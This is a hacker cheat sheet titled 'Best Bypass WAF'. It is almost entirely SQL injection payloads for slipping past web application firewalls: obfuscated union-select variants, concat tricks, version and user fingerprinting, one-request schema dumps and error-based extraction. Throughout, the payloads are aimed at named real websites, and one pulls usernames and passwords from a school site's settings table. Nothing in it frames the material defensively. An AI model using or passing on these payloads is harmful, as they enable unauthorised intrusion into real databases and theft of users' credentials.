- ------------------------------Best Bypass WAF------------------------------------
- zen solution:::http://www.univcasa.ma/factualite.php?id=318999 UNIUNIONON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CoNCat%0a(0x3c62723e3c666f6e7420636f6c6f723d5265642073697a653d333e496e6a3363743364204279205a656e3c62723e56657273696f6e203a20,version(),0x3c62723e557365722829203a20,user(),0x3c62723e4462617365203a20,dATAbASe(),(sELsELecTecT(@)frfromom(sELfromecT(@:=0x00),(sELfromecT(@)frfromom(`InFoRMAfromtiON_sCHeMa`.`ColUfromMNs`)whunionere(`TAbunionlE_sCHunionemA`=DatAbAsE())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBunionLe_nAMe,0x3a3a,coluunionmn_name))))a)),14,15,16,17%23
- gawd's solution::::http://www.univcasa.ma/factualite.php?id=-318++UNIunionON+ALL+SELSELECTECT+1,2,3,4,5,6,7,8,9,10,11,12,CONCAT%280x526168756c203a33,0x3c42723e,user%28%29,0x3c42723e,@@VERSION,0x3c42723e,%28SELESELECTCT%28@x%29FROFROMM%28SELESELECTCT%28@x:=0x00%29,%28@NR:=0%29,%28SELESELECTCT%280%29FROFROMM%28INFORMATIINFORMATION_SCHEMAON_SCHEMA.ColColumnsumns%29WHWHEREERE%28TABLE_STABLE_SCHEMACHEMA!=0x696e666f726d6174696f6e5f736368656d61%29AND%280x00%29IN%28@x:=CONCAT%28@x,LPAD%28@NR:=@NR%2b1,4,0x30%29,0x3a20,table_name,0x3a,column_ncolumn_nameame,0x3c62723e%29%29%29%29x%29%29,14,15,16,17--+-
- ashfaq bro's solution::: http://www.univcasa.ma/factualite.php?id=318 and 0 UnunionION SeLselectEct 1,2,3,4,5,6,7,8,9,0,11,12,concat('rootxx',version(),'<br>',(SeLselectEct (@x)frFROMom(SeLselectEct (@x:=0x00),(@NR:=0),(SeLselectEct (0)frFROMom(informationINFORMATION_SCHEMA_schema.TABLES)whWHEREere(tableTABLE_SCHEMA_schema!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,/*!12345Table_NSELECTamE*/,0x3c62723e))))x)),14,15,16,17--
- kazam gujjar :::http://www.univcasa.ma/factualite.php?id=-318888888888888+unUNIONion+ALL+seSELECTlect+1,2,3,4,5,6,7,8,9,10,11,12,concat%280x3c62723e,0x3c666f6e7420636f6c6f723d626c75652073697a653d35203e202d2d3d3d3e206b34346a3167756a6a34722068337233203c3d3d2d2d203c2f666f6e743e,0x3c62723e,0x56455253494f4e3d,version%28%29,0x3c62723e,0x555345523d,user%28%29,0x3c62723e,0x44423d,database%28%29,%20make_set%286,@:=0x0a,%28seSELECTlect%281%29frFROMom%28inINFORMATION_SCHEMAformation_schema.coCOLUMNSlumns%29whWHEREere%28taTABLE_SCHEMAble_schema!=0x696e666f726d6174696f6e5f736368656d61%29and@:=make_set%28511,@,0x3c6c693e,TaBlE_NaMe,coCOLUMN_NAMElumn_name%29%29,@%29%29,14,15,16,17--+
- very hard waf
- http://www.geneticsandsociety.org/article.php?id=305 and true Union%A0%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
- 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Select '0
- and false Un\ion Select c\oncat(0x3\c62723e3c666f6e7420636f6c6f723d7265643e72306f744
- 048335834393c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e,0x3\c62723e3c
- 666f6e7420636f6c6f723d626c75653e2056657273696f6e203a3a3a203c666f6e7420636f6
- c6f723d677265656e3e,v\ersion(),0x3\c62723e3c666f6e7420636f6c6f723d626c75653e20446174616261
- 7365203a3a3a203c666f6e7420636f6c6f723d677265656e3e,d\atabase(),0x3\c62723e3c666f6e7420636f
- 6c6f723d626c75653e2055736572203a3a3a3a203c666f6e7420636f6c6f723d677265656e3e,U\ser
- (),0x3\c62723e3c666f6e7420636f6c6f723d7265643e205461626c6573203a203c666f6e7420636f6
- c6f723d677265656e3e,c\oncat_ws(0x20,@:=0x00,(Select(t\able_name)fr\om(information_s\chema.
- t\ables)+wh\ere+(t\able_s\chema = d\atabase())+an\d@:=c\oncat_ws(0x20,@,0x3\c6c
- 693e3c666f6e7420636f6c6f723d7265643e,t\able_name,0x3\c2f666f6e743e)),@)),0x
- 32,0x33,0x34--'%20
- www.itpark.am/floor.php?lang=us&build=B'and@x:=C%5CON%5CCAT(ver%5Csion(),0x3a,data%5Cbase(),0x3a3a,u%5Cs%5Cer%5C(%5C),0x3c62723e,(SELE%5CCT+GROUP_CON%5CCAT(TAB%5CLE_NA%5CME+separator+0x3c6c693e)FR%5COM+INFORMATION_S%5CCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATA%5CBASE()))UNION+SELE%5CCT+CON%5CCAT(0x273e,0x3c62723e,'~m@db100d~',@x,0x3c212d2d)%60&floor=null&go=null
- [~] order by [~]
- /**/ORDER/**/BY/**/
- /*!order*/+/*!by*/
- /*!ORDER BY*/
- /*!50000ORDER BY*/
- /*!50000ORDER*//**//*!50000BY*/
- /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- + #?uNiOn + #?sEleCt
- + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- +%2F**/+Union/*!select*/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
- UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- [~] after id no. like id=1 +/*!and*/+1=0 [~]
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- --'- : +--+ / : -- - : --+- : /*
- ) order by 1-- -
- ') order by 1-- -
- ')order by 1%23%23
- %')order by 1%23%23
- Null' order by 100--+
- Null' order by 9999--+
- ')group by 99-- -
- 'group by 119449-- -
- 'group/**/by/**/99%23%23
- union select ByPassing method
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- +/*!u%6eion*/+/*!se%6cect*/+
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- 1%')and(0)union(select(1),version(),3,4,5,6)%
- 23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- %55nion %53elect
- +--+Union+--+Select+--+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- UnIoN SeLeCt CoNcAt(version())--
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- ==============================
- ==============================
- ==============================
- =========================================
- :: Buffer Overflow ::
- ==============================
- ==============================
- ==============================
- =========================================
- +And(select 1)=(select 0×414)+union+select+1–
- +And(select 1)=(select 0xAAAA)+union+select
- +1–
- +And(select 1)=(select 0×4141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 41414141414141414141414141414141414
- 1414141)+
- +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
- ==============================
- ==============================
- ==============================
- ========================================
- :: 400 Bad Request ::
- ==============================
- ==============================
- ==============================
- ========================================
- –+%0A
- union+select+1–+%0A,2–+%0A,3–+%0A,4–+
- %0A,5–+%0A –
- ==============================
- ==============================
- ==============================
- ========================================
- null the parameter
- ==============================
- ==============================
- ==============================
- ========================================
- id=-1
- id=null
- id=1+and+false+
- id=9999
- id=1 and 0
- id==1
- id=(-1)
- ==============================
- ==============================
- ==============================
- ==============================
- ===============
- Group_Concat
- ==============================
- ==============================
- ==============================
- ==============================
- ===============
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,
- %22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- ==============================
- ==============================
- ==============================
- ==============================
- ============
- To make the column number appear on the page, put this after the id
- ==============================
- ==============================
- ==============================
- ==============================
- ============
- id=1+and+1=0+union+select+1,2,3,4,5,6
- +AND+1=0
- /*!aND*/ 1 like 0
- +/*!and*/+1=0
- +and+2>3+
- +and(1)=(0)
- and (1)!=(0)
- +div+0
- Having+1=0
- ==============================
- ==============================
- ==============================
- =========================================
- function ByPassing
- ==============================
- ==============================
- ==============================
- =========================================
- unhex(hex(value))
- cast(value as char)
- uncompress(compress(version()))
- cast(version() as char)
- aes_decrypt(aes_encrypt(version(),1),1)
- binary(version())
- convert(value using ascii)
- ==============================
- ==============================
- ==============================
- =========================================
- avoid source page injection
- ==============================
- ==============================
- ==============================
- =========================================
- concat(?”>,<br><br><br>,@@version,?<img
- src=”,?<?’#)
- “><br>? <img src=”
- <img src=””/>injection<img src=”
- concat(0x223e,@@version)
- concat(0x273e27,version(),0x3c212d2d)
- concat(0x223e3c62723e,version
- (),0x3c696d67207372633d22)
- concat(0x223e,@@version,0x3c69
- 6d67207372633d22)
- concat(0x223e,0x3c62723e3c6272
- 3e3c62723e,@@version,0x3c696d6
- 7207372633d22,0x3c62723e)
- concat(0x223e3c62723e,@@versio
- n,0x3a,”BlackRose”,0x3c696d67207372633d22)
- concat(‘</title>’,@@version,’<title>’)
- concat(0x273c2f7469746c653e27,
- @@version,0x273c7469746c653e27)
- concat(0x273c2f7469746c653e27,version
- (),0x273c7469746c653e27)
- ==============================
- ==============================
- ==============================
- =========================================
- get version – DB_NAME – user – HOST_NAME –
- datadir
- ==============================
- ==============================
- ==============================
- =========================================
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 = true, 0 = false
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(substr(@@version,1,1)=5),4,5 –
- ==============================
- ==============================
- ==============================
- ========================================
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- # like # http://www.marinaplast.com/page.php?
- id=13 /*!50095aaaa*/
- id=1 /*!40123 1=1*/–+- no error
- id=1 /*!40122rrrr*/ no error
- # like # http://www.marinaplast.com/page.php?
- id=13 /*!40122rrrr*/ error not v4
- ==============================
- ==============================
- ==============================
- =======================================
- DB_NAME()
- ==============================
- ==============================
- ==============================
- =======================================
- @@database
- database()
- id=vv()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,DB_NAME(),4,5 –
- http://www.marinaplast.com/page.php?id=vv()
- @@user
- user()
- user_name()
- system_user()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,user(),4,5 –
- HOST_NAME()
- @@hostname
- @@servername
- SERVERPROPERTY()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,HOST_NAME(),4,5 –
- @@datadir
- datadir()
- # like # http://www.marinaplast.com/page.php?
- id=-13 union select 1,2,datadir(),4,5 –
- ASPX
- and 1=0/@@version
- ‘ and 1=0/@@version;–
- ‘) and 1=@@version–
- and 1=0/user;–
- Requested method
- [DUMP DB in 1 Request]
- (select (@) from (select(@:=0×00),(select (@)
- from (information_schema.columns) where
- (table_schema>=@) and (@)in (@:=concat(@,0x
- 0a,’ [ ',table_schema,' ] >’,table_name,’ >
- ‘,column_name))))x)
- (select(@) from (select (@:=0×00),(select (@)
- from (table) where (@) in (@:=concat(@,0x
- 0a,column1,0x3a,column2))))a)
- ==============================
- ==============================
- ==============================
- =========================================
- [DUMP DB in 1 Request improve]
- ==============================
- ==============================
- ==============================
- =========================================
- (select(@x)from(select(@x:=0×00),(select(0)fr
- om(information_schema.columns)where
- (table_schema!=0x696e666f726d6174696f6e5
- f736368656d61)and(0×00)in(@x:=concat
- (@x,0x3c62723e,table_schema,0x2e,table_
- name,0x3a,column_name))))x)
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select(@x)from(select(@x:
- =0×00),(select(0)from(information_schema.colu
- mns)where(table_schema!=0x696e
- 666f726d6174696f6e5f736368656d61)and
- (0×00)in(@x:=c oncat(@x,0x3c62
- 723e,table_schema,0x2e,table_n
- ame,0x3a,column_name))))x),4,5 –
- ==============================
- ==============================
- ==============================
- =========================================
- #2#
- ==============================
- ==============================
- ==============================
- =========================================
- method like DUMP DB in 1 Request
- ==============================
- ==============================
- ==============================
- =========================================
- concat(@i:=0×00,@o:=0xd0a,benchmark
- (40,@o:=CONCAT( @o,0xd0a,(SELECT concat
- (table_schema,0x2E,@i:=table_name) FROM
- information_schema.tables WHERE
- table_name>@i order by table_name LIMIT 1)))
- like
- http://www.mishnetorah.com/shop/details.php?
- id=-26+union+select+1,2,3,concat
- (@i:=0×00,@o:=0xd0a,benchmark(
- 40,@o:=CONCAT(@o,0xd0a ,(SELECT concat
- (table_schema,0x2E,@i:=table_name) FROM
- information_schema.tables WHERE
- table_name>@i order by table_name LIMIT
- 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,
- 16,17,18,19,20,21
- ==============================
- ==============================
- ==============================
- =========================================
- #3#
- ==============================
- ==============================
- ==============================
- =========================================
- databases
- (select+count(schema_name) +from+informati
- on_schema.schemata)
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+count(schema_name)
- +from+information_schema.schemata),4,5 –
- tables
- (select+count(table_name) +from+informati
- on_schema.tables)
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+count(table_name) +from
- +information_schema.tables),4,5 –
- columns
- (select+count(column_name) +from+informati
- on_schema.columns)
- # like #
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+count(column_name)
- +from+information_schema.columns),4,5 –
- ==============================
- ==============================
- ==============================
- =========================================
- #4#
- ==============================
- ==============================
- ==============================
- =========================================
- show the table with all its columns
- CONCAT(table_name,0x3e,GROUP_CONCAT
- (column_name))
- +FROM information_schema.columns WHERE
- table_schema=database() GROUP BY table_name
- LIMIT 1,1–+
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,CONCAT(table_name,0x3e,GRO
- UP_CONCAT(column_name)),4,5 +FROM
- information_schema.columns WHERE
- table_schema=database() GROUP BY table_name
- LIMIT 0,1–+
- ==============================
- ==============================
- ==============================
- =========================================
- #5#WWWWWWWWWWWAAAAAAAAAAAAAAAA
- AAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
- ==============================
- ==============================
- ==============================
- =========================================
- filtered requests
- # tables #
- group_concat(/*!table_name*/)
- +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!
- WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
- /*!From*/+%69nformation_schema./**/tAblES+/
- *!50000Where*/+/*!%54able_ScHEmA*/=schEMA
- ()– -
- ==============================
- ==============================
- ==============================
- =========================================
- # columns #
- ==============================
- ==============================
- ==============================
- =========================================
- group_concat(/*!column_name*/)
- +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!
- WheRe*/ /*!tAblE_naMe*/=hex table
- /*!From*/+%69nformation_schema./**/columns
- +/*!50000Where*/+/*!%54able_name*/=hex
- table
- /*!froM*/ table– -
- ==============================
- ==============================
- ==============================
- =========================================
- #6#
- ==============================
- ==============================
- ==============================
- =========================================
- bypass method
- (select+group_concat(/*!table_name*/)+/*!
- From*/+%69nformation_schema./**/tAblES+/*!
- 50000Where*/+/*!%54able_ScHEmA*/=schEMA
- ())
- (select+group_concat(/*!column_name*/)+/*!
- From*/+%69nformation_schema./**/columns+/*!
- 50000Where*/+/*!%54able_name*/=hex table)
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,(select+group_concat(/*!
- table_name*/)+/*!From*/+%69nformation_s
- chema./**/tAblES+/*!50000Where*/+/*!
- %54able_ScHEmA*/=schEMA()),4,5 –
- ==============================
- ==============================
- ==============================
- =========================================
- #7#
- ==============================
- ==============================
- ==============================
- =========================================
- bypass method
- unhex(hex(Concat(Column_Name,0
- x3e,Table_schema,0x3e,table_Name)))
- /*!from*/information_schema.columns/*!where*/
- column_name%20/*!like*/char(37,%20112,%
- 2097,%20115,%20115,%2037)
- like
- http://www.marinaplast.com/page.php?id=-13
- union select 1,2,unhex(hex(Concat(Column_Na
- me,0x3e,Table_schema,0x3e,tabl
- e_Name))),4,5 /*!from*/information_sche
- ma.columns/*!where*/column_name%20/*!like*/
- char(37,%20112,%2097,%20115,%20115,
- %2037)–
- ==============================
- ==============================
- ==============================
- =========================================
- [+] Union Select:
- ==============================
- ==============================
- ==============================
- =========================================
- union /*!select*/+
- union/**/select/**/
- /**/union/**/select/**/
- /**/union/*!50000select*/
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/uniUNIONon/**/selSELECTect/**/
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- /**//*!union*//**//*!select*//**/
- /**/UNunionION/**/SELselectECT/**/
- /**//*UnIOn*//**//*SEleCt*//**/
- /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//
- *l*//*e*//*C*//*t*//**/
- /**/UNunionION/**/all/**/SELselectECT/**/
- /**//*UnIOn*//**/all/**//*SEleCt*//**/
- /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//
- *S*//*E*//*l*//*e*//*C*//*t*//**/
- uni<on all sel<ect
- %20union%20/*!select*/%20
- union%23aa%0Aselect
- union+distinct+select+
- union+distinctROW+select+
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSel
- Ect*/
- %252f%252a*/UNION%252f%252a /SELECT
- %252f%252a*/
- %23sexsexsex%0AUnIOn%23sexsexsex
- %0ASeLecT+
- /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- /*!u%6eion*/+/*!se%6cect*/+
- 1%’)and(0)union(select(1),version(),3,4,5,6)%
- 23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- +%2F**/+Union/*!select*/
- %55nion %53elect
- +–+Union+–+Select+–+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- union(select(1),2,3)
- union (select 1111,2222,3333)
- union (/*!/**/ SeleCT */ 11)
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*–*//*!all*//*–*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo
- %0D%0A1% 2C2%2C
- union+sel%0bect
- +uni*on+sel*ect+
- + #1q %0Aunion all#qa%0A#%0Aselect
- 1,2,3,4,5,6,7,8,9,10%0A#a
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
- id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
- union select 1–+%0A,2–+%0A,3–+%0A etc ….
- ==============================
- ==============================
- ==============================
- =========================================
- [+] Buffer overflow:
- ==============================
- ==============================
- ==============================
- =========================================
- +And(select 1)=(select 0×414)+union+select+1–
- +And(select 1)=(select 0xAAAA)+union+select
- +1–
- +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
- +and (/*!select*/ 1)=(/*!select*/ 0×414)+
- +And(select 1)=(select 0×4141414141414
- 141414141414141414141414141414
- 141414141414141414141414141414?1414
- 141414141414141414141414141414
- 141414141414141414141414141414
- 14141414141414141414 141414141414141
- 414141414141414141414141414141
- 4141414141414141414141414141414?141
- 414141414141414141414141414141
- 414141414141414141414141414141
- 41414141414141414141 414141414141414
- 141414141414141414141414141414
- 14141414141414141414141414141414141
- 414141414141414141414141414141
- 414141414141414141414141414141
- 41414141414141414141 414141414141414
- 141414141414141414141414141414
- 14141414141414141414141414141414141
- 414141414141414141414141414141
- 414141414141414141414141414141
- 41414141414141414141 414141414141414
- 141414141414141414141414141414
- 14141414141414141414141414141414141 4141)+
- ==============================
- ==============================
- ==============================
- =========================================
- [+] Group Concat:
- ==============================
- ==============================
- ==============================
- =========================================
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,
- %22testtest%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- ==============================
- ==============================
- ==============================
- =========================================
- ERROR BASED
- ==============================
- ==============================
- ==============================
- =========================================
- =21 or 1 group by concat_ws(0x3a,version(),floor
- (rand(0)*2)) having min(0) or 1–
- Database
- 21 and (select 1 from (select count(*),concat
- ((select(select concat(cast(database() as
- char),0x7e)) from information_schema.tables
- where table_schema=database() limit 0,1),floor
- (rand(0)*2))x from information_schema.tables
- group by x)a)
- Table_name
- and (select 1 from (select count(*),concat((select
- (select concat(cast(table_name as char),0x7e))
- from information_schema.tables where
- table_schema=database() limit 19,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a)
- Columns
- 21 and (select 1 from (select count(*),concat
- ((select(select concat(cast(column_name as
- char),0x7e)) from information_schema.columns
- where table_name=0x73657474696e6773 limit
- 2,1),floor(rand(0)*2))x from information_sch
- ema.tables group by x)a)
- extract data
- http://www.aliqbalschools.org/index.php?
- mode=getpagecontent&pageID=21 and (select 1
- from (select count(*),concat((select(select concat
- (cast(concat(userName,0x7e,passWord) as
- char),0x7e)) from iqbal_iqbal.settings limit
- 0,1),floor(rand(0)*2))x from information_sch
- ema.tables group by x)a)
- Notice the limit function in the query
- A website can have more than 2 two databases,
- so increase the limit until you find all database
- names
- Example: limit 0,1 or limit 1,1 or limit 2,1
- ==============================
- ==============================
- ==============================
- =========================================
- Differences:
- Error Based Query for Database Extraction:
- ==============================
- ==============================
- ==============================
- =========================================
- and (select 1 from (select count(*),concat((select
- (select concat(cast(database() as char),0x7e))
- from information_schema.tables where
- table_schema=database() limit 0,1),floor(rand
